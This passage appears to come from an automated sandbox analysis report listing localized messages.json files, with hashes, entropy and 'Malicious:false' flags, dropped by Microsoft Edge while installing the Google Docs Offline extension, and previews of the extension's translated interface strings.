                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):990
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                          MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                          SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                          SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                          SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1658
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                          MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                          SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                          SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                          SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1672
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                          MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                          SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                          SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                          SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):935
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                          MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                          SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                          SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                          SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1065
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                          MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                          SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                          SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                          SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2771
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                          MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                          SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                          SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                          SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):858
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                          MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                          SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                          SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                          SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):954
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                          MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                          SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                          SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                          SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):899
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                          MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                          SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                          SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                          SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2230
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                          MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                          SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                          SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                          SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1160
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                          MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                          SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                          SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                          SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3264
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                                          MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                                          SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                                          SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                                          SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2648_1533588716\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3235
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                                          MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                                          SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                                          SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
